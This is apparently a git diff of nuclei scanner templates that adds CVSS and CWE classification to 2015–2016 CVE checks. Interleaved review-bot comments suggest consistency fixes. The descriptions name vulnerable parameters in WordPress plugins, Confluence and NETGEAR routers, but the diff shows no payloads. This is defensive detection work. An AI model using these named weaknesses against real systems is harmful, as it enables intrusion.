@@ -7,6 +7,11 @@ info: description: Cross-site scripting (XSS) vulnerability in SourceBans before 2.0 pre-alpha allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2015-8349 tags: cve,cve2015,xss,sourcebans + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2015-8349 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2015/CVE-2015-8399.yaml b/cves/2015/CVE-2015-8399.yaml index dbe4e9c097..55ff02a7c7 100644 --- a/cves/2015/CVE-2015-8399.yaml +++ b/cves/2015/CVE-2015-8399.yaml @@ -6,6 +6,11 @@ info: description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro tags: cve,cve2015,atlassian,confluence + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2015-8399 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2015/CVE-2015-8813.yaml b/cves/2015/CVE-2015-8813.yaml index 35e2bc110b..d9b0c56e21 100644 --- a/cves/2015/CVE-2015-8813.yaml +++ b/cves/2015/CVE-2015-8813.yaml @@ -9,6 +9,11 @@ info: - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2015-8813 tags: cve,cve2015,ssrf,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N + cvss-score: 8.20 + cve-id: CVE-2015-8813 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2015/CVE-2015-9414.yaml b/cves/2015/CVE-2015-9414.yaml index d5c3fea0f8..d65a7b2262 100644 --- a/cves/2015/CVE-2015-9414.yaml +++ b/cves/2015/CVE-2015-9414.yaml 
@@ -8,6 +8,12 @@ info:
 - https://wpscan.com/vulnerability/2ac2d43f-bf3f-4831-9585-5c5484051095
 - https://nvd.nist.gov/vuln/detail/CVE-2015-9414
 tags: cve,cve2015,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2015-9414
+ cwe-id: CWE-79
+ description: "The wp-symposium plugin through 15.8.1 for WordPress has XSS via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter."
 requests:
 - method: GET
diff --git a/cves/2015/CVE-2015-9480.yaml b/cves/2015/CVE-2015-9480.yaml
index bcd3d48d4d..aff9aca94d 100644
--- a/cves/2015/CVE-2015-9480.yaml
+++ b/cves/2015/CVE-2015-9480.yaml
@@ -8,6 +8,12 @@ info:
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480
 - https://www.exploit-db.com/exploits/37252
 tags: cve,cve2015,wordpress,wp-plugin,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2015-9480
+ cwe-id: CWE-22
+ description: "The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter."
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-0957.yaml b/cves/2016/CVE-2016-0957.yaml
index 676d804499..55a0fb1e4e 100644
--- a/cves/2016/CVE-2016-0957.yaml
+++ b/cves/2016/CVE-2016-0957.yaml
@@ -7,6 +7,10 @@ info:
 reference: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
 severity: high
 tags: cve,cve2016,adobe,aem
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2016-0957
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml
index 0d3a928804..7570661517 100644
--- a/cves/2016/CVE-2016-1000126.yaml
+++ b/cves/2016/CVE-2016-1000126.yaml
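Review bot: The new `description:` lines for CVE-2015-9414 and CVE-2015-9480 are appended after the `classification:` block, whereas the sibling templates in this same patch (CVE-2015-8349, CVE-2015-8399 on the previous line) keep `description` directly under `severity`, ahead of `reference` and `tags`. YAML mappings are unordered so nuclei parses either form, but a stable key order keeps diffs and later bulk edits uniform; I would move the line up so the `info` block reads name, author, severity, description, reference, tags, classification. The CVE-2016-0957 hunk is also the only one on this line without a `cwe-id`; if NVD carries no CWE for it, a short `# NVD lists no CWE for this entry` comment beside the block would save the next editor a lookup.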
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000126
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin admin-font-editor v1.8"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml
index 459e6c5829..51c400aa1e 100644
--- a/cves/2016/CVE-2016-1000127.yaml
+++ b/cves/2016/CVE-2016-1000127.yaml
@@ -7,6 +7,11 @@ info:
 description: Reflected XSS in wordpress plugin ajax-random-post v2.00
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000127
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000128.yaml b/cves/2016/CVE-2016-1000128.yaml
index b0abb144a2..9e8645e466 100644
--- a/cves/2016/CVE-2016-1000128.yaml
+++ b/cves/2016/CVE-2016-1000128.yaml
@@ -9,6 +9,11 @@ info:
 - http://www.vapidlabs.com/wp/wp_advisory.php?v=161
 - https://wordpress.org/plugins/anti-plagiarism
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000128
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000129.yaml b/cves/2016/CVE-2016-1000129.yaml
index 9b0f14449b..fbeb35821b 100644
--- a/cves/2016/CVE-2016-1000129.yaml
+++ b/cves/2016/CVE-2016-1000129.yaml
@@ -7,6 +7,11 @@ info:
 description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000129
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000130.yaml b/cves/2016/CVE-2016-1000130.yaml
index 18141078b1..04c6324c51 100644
--- a/cves/2016/CVE-2016-1000130.yaml
+++ b/cves/2016/CVE-2016-1000130.yaml
@@ -7,6 +7,11 @@ info:
 description: Reflected XSS in wordpress plugin e-search v1.0
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000130
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000131.yaml b/cves/2016/CVE-2016-1000131.yaml
index a9c8dcbf8d..f9e0d4a700 100644
--- a/cves/2016/CVE-2016-1000131.yaml
+++ b/cves/2016/CVE-2016-1000131.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000131
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin e-search v1.0"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000132.yaml b/cves/2016/CVE-2016-1000132.yaml
index fa9404875a..c33a51fe7a 100644
--- a/cves/2016/CVE-2016-1000132.yaml
+++ b/cves/2016/CVE-2016-1000132.yaml
@@ -7,6 +7,11 @@ info:
 description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000132
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000133.yaml b/cves/2016/CVE-2016-1000133.yaml
index 48e7531114..64968b022f 100644
--- a/cves/2016/CVE-2016-1000133.yaml
+++ b/cves/2016/CVE-2016-1000133.yaml
@@ -7,6 +7,11 @@ info:
 description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000133
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000134.yaml b/cves/2016/CVE-2016-1000134.yaml
index 99d42687c9..d11a917306 100644
--- a/cves/2016/CVE-2016-1000134.yaml
+++ b/cves/2016/CVE-2016-1000134.yaml
@@ -7,6 +7,11 @@ info:
 description: Reflected XSS in wordpress plugin hdw-tube v1.2
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000134
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000135.yaml b/cves/2016/CVE-2016-1000135.yaml
index 48480b29c5..5fbb768196 100644
--- a/cves/2016/CVE-2016-1000135.yaml
+++ b/cves/2016/CVE-2016-1000135.yaml
@@ -7,6 +7,11 @@ info:
 description: Reflected XSS in wordpress plugin hdw-tube v1.2
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000135
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml
index 12a3ce8d62..eb4ae2195c 100644
--- a/cves/2016/CVE-2016-1000137.yaml
+++ b/cves/2016/CVE-2016-1000137.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=658
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000137
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin hero-maps-pro v2.1.0"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml
index b92f330cd6..ee73a4ce9f 100644
--- a/cves/2016/CVE-2016-1000138.yaml
+++ b/cves/2016/CVE-2016-1000138.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000138
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin indexisto v1.0.5"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml
index 05a6a6285a..b3ff2bbb88 100644
--- a/cves/2016/CVE-2016-1000139.yaml
+++ b/cves/2016/CVE-2016-1000139.yaml
@@ -8,6 +8,12 @@ info:
 - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
 tags: cve,cve2016,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000139
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000140.yaml b/cves/2016/CVE-2016-1000140.yaml
index 8f25cbc37c..32a78c7534 100644
--- a/cves/2016/CVE-2016-1000140.yaml
+++ b/cves/2016/CVE-2016-1000140.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000140
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin new-year-firework v1.1.9"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml
index b45691d8da..4d9e921b14 100644
--- a/cves/2016/CVE-2016-1000146.yaml
+++ b/cves/2016/CVE-2016-1000146.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000146
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin pondol-formmail v1.1"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000148.yaml b/cves/2016/CVE-2016-1000148.yaml
index fbb5d33d47..7340d0b0c2 100644
--- a/cves/2016/CVE-2016-1000148.yaml
+++ b/cves/2016/CVE-2016-1000148.yaml
@@ -8,6 +8,12 @@ info:
 - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54
 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148
 tags: cve,cve2016,wordpress,wp-plugin,xss
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000148
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin s3-video v0.983"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000149.yaml b/cves/2016/CVE-2016-1000149.yaml
index b5e0487209..7998ec03d5 100644
--- a/cves/2016/CVE-2016-1000149.yaml
+++ b/cves/2016/CVE-2016-1000149.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000149
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000149
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin simpel-reserveren v3.5.2"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000152.yaml b/cves/2016/CVE-2016-1000152.yaml
index 2dd82e5904..d44cabdaa9 100644
--- a/cves/2016/CVE-2016-1000152.yaml
+++ b/cves/2016/CVE-2016-1000152.yaml
@@ -7,6 +7,11 @@ info:
 description: Reflected XSS in wordpress plugin tidio-form v1.0
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000152
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml
index e1ae1a74aa..8e9ef8b66c 100644
--- a/cves/2016/CVE-2016-1000153.yaml
+++ b/cves/2016/CVE-2016-1000153.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000153
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin tidio-gallery v1.1"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000154.yaml b/cves/2016/CVE-2016-1000154.yaml
index c459fd33e9..dfbff06092 100644
--- a/cves/2016/CVE-2016-1000154.yaml
+++ b/cves/2016/CVE-2016-1000154.yaml
@@ -7,6 +7,11 @@ info:
 description: Reflected XSS in wordpress plugin whizz v1.0.
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000154
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000154
+ cwe-id: CWE-79
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml
index 4772141fcf..70f109f44c 100644
--- a/cves/2016/CVE-2016-1000155.yaml
+++ b/cves/2016/CVE-2016-1000155.yaml
@@ -6,6 +6,12 @@ info:
 severity: medium
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
 tags: cve,cve2016,wordpress,xss,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-1000155
+ cwe-id: CWE-79
+ description: "Reflected XSS in wordpress plugin wpsolr-search-engine v7.6"
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml
index 479d0f70f3..ff51ed5643 100644
--- a/cves/2016/CVE-2016-10033.yaml
+++ b/cves/2016/CVE-2016-10033.yaml
@@ -2,10 +2,15 @@ id: CVE-2016-10033
 info:
 name: Wordpress 4.6 Remote Code Execution
 author: princechaddha
- severity: high
+ severity: critical
 description: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
 reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
 tags: wordpress,cve,cve2016,rce
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2016-10033
+ cwe-id: CWE-77
 requests:
 - raw:
diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml
index 4134b4a8b4..e70c75ed3a 100644
--- a/cves/2016/CVE-2016-10956.yaml
+++ b/cves/2016/CVE-2016-10956.yaml
@@ -9,6 +9,11 @@ info:
 - https://cxsecurity.com/issue/WLB-2016080220
 - https://wpvulndb.com/vulnerabilities/8609
 tags: cve,cve2016,wordpress,wp-plugin,lfi
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2016-10956
+ cwe-id: CWE-20
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml
index 9f3466faaa..7d70ef5104 100644
--- a/cves/2016/CVE-2016-10960.yaml
+++ b/cves/2016/CVE-2016-10960.yaml
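Review bot: `severity: critical` for CVE-2016-10033 now has to agree with the hand-typed `cvss-score: 9.80` a few lines below, and nothing in the template enforces that; the same pattern of manual severity flips in both directions (critical→high, high→critical) repeats across this patch. Since nuclei reads both fields, I would document the convention once and check it in CI: map the CVSS v3 score to its qualitative band (9.0–10.0 critical, 7.0–8.9 high, 4.0–6.9 medium, below 4.0 low) and fail the build when `severity` disagrees, so the two fields cannot drift apart in later edits. The CVE-2016-10956 hunk on this line also tags the template `lfi` while classifying it `cwe-id: CWE-20`; if that is what NVD records it is fine to keep for consistency, otherwise `cwe-id: CWE-22` matches the traversal the tag and the rest of this patch describe.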
@@ -3,13 +3,18 @@ id: CVE-2016-10960
 info:
 name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
 author: daffainfo
- severity: critical
+ severity: high
 description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
 reference:
 - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
 - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
 tags: cve,cve2016,wordpress,wp-plugin,rce
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2016-10960
+ cwe-id: CWE-20
 requests:
 - method: POST
diff --git a/cves/2016/CVE-2016-10993.yaml b/cves/2016/CVE-2016-10993.yaml
index 5dcf8191cd..0f3716e9fe 100644
--- a/cves/2016/CVE-2016-10993.yaml
+++ b/cves/2016/CVE-2016-10993.yaml
@@ -8,6 +8,12 @@ info:
 - https://www.vulnerability-lab.com/get_content.php?id=1808
 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993
 tags: cve,cve2016,wordpress,wp-theme,xss
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.40
+ cve-id: CVE-2016-10993
+ cwe-id: CWE-79
+ description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter."
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-2004.yaml b/cves/2016/CVE-2016-2004.yaml
index 639320dfc8..8111ac538d 100644
--- a/cves/2016/CVE-2016-2004.yaml
+++ b/cves/2016/CVE-2016-2004.yaml
@@ -9,6 +9,11 @@ info:
 reference:
 - https://www.exploit-db.com/exploits/39858
 - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2016-2004
+ cwe-id: CWE-306
 network:
 - inputs:
diff --git a/cves/2016/CVE-2016-2389.yaml b/cves/2016/CVE-2016-2389.yaml
index a65ee5deea..364e21e9ba 100644
--- a/cves/2016/CVE-2016-2389.yaml
+++ b/cves/2016/CVE-2016-2389.yaml
@@ -9,6 +9,11 @@ info:
 - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
 - https://www.cvedetails.com/cve/CVE-2016-2389
 tags: cve,cve2016,lfi,sap
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.50
+ cve-id: CVE-2016-2389
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml
index 26b9577ef4..86662795dc 100644
--- a/cves/2016/CVE-2016-3081.yaml
+++ b/cves/2016/CVE-2016-3081.yaml
@@ -10,6 +10,11 @@ info:
 - https://cwiki.apache.org/confluence/display/WW/S2-032
 - https://struts.apache.org/docs/s2-032.html
 tags: cve,cve2016,struts,rce,apache
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.10
+ cve-id: CVE-2016-3081
+ cwe-id: CWE-77
 requests:
 - raw:
diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml
index 2238126a04..40868caf7e 100644
--- a/cves/2016/CVE-2016-5649.yaml
+++ b/cves/2016/CVE-2016-5649.yaml
@@ -7,6 +7,11 @@ info:
 description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
 tags: cve,cve2016,iot,netgear,router
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2016-5649
+ cwe-id: CWE-200
 requests:
 - raw:
diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml
index 964fdfed40..fddddf2586 100644
--- a/cves/2016/CVE-2016-6277.yaml
+++ b/cves/2016/CVE-2016-6277.yaml
@@ -3,12 +3,17 @@ id: CVE-2016-6277
 info:
 name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE
 author: pikpikcu
- severity: critical
+ severity: high
 description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.
 tags: cve,cves2016,netgear,rce,iot
 reference:
 - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
 - https://nvd.nist.gov/vuln/detail/CVE-2016-6277
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 8.80
+ cve-id: CVE-2016-6277
+ cwe-id: CWE-352
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-7552.yaml b/cves/2016/CVE-2016-7552.yaml
index 686d2c2635..0e56752878 100644
--- a/cves/2016/CVE-2016-7552.yaml
+++ b/cves/2016/CVE-2016-7552.yaml
@@ -7,6 +7,11 @@ info:
 description: On the Trend Micro Threat Discovery Appliance 2.6.1062r1, directory traversal when processing a session_id cookie allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.
 reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
 tags: cve,cve2016,lfi
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2016-7552
+ cwe-id: CWE-22
 requests:
 - method: GET
diff --git a/cves/2016/CVE-2016-7981.yaml b/cves/2016/CVE-2016-7981.yaml
index 9f543433f5..a15b21c00b 100644
--- a/cves/2016/CVE-2016-7981.yaml
+++ b/cves/2016/CVE-2016-7981.yaml
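Review bot: `cwe-id: CWE-352` (CSRF) for CVE-2016-6277 does not match the hunk's own description, which is unauthenticated command execution via shell metacharacters in the cgi-bin path info, nor the referenced CERT write-up whose URL itself says `cwe-77`. If the value was copied from NVD it can stay for consistency, but the `UI:R` in the vector and the CSRF CWE reflect a browser-delivered framing of the bug; the template's GET request sits outside the hunk and presumably needs no user interaction, so the severity downgrade from `critical` to `high` deserves a second look rather than a blind copy. While here, the context line `tags: cve,cves2016,netgear,rce,iot` carries a typo, `cves2016`, that silently excludes this template from `-tags cve2016` runs; change it to `tags: cve,cve2016,netgear,rce,iot`.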
@@ -8,6 +8,11 @@ info:
 Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action.
 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981
 tags: cve,cve2016,xss,spip
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2016-7981
+ cwe-id: CWE-79
 requests:
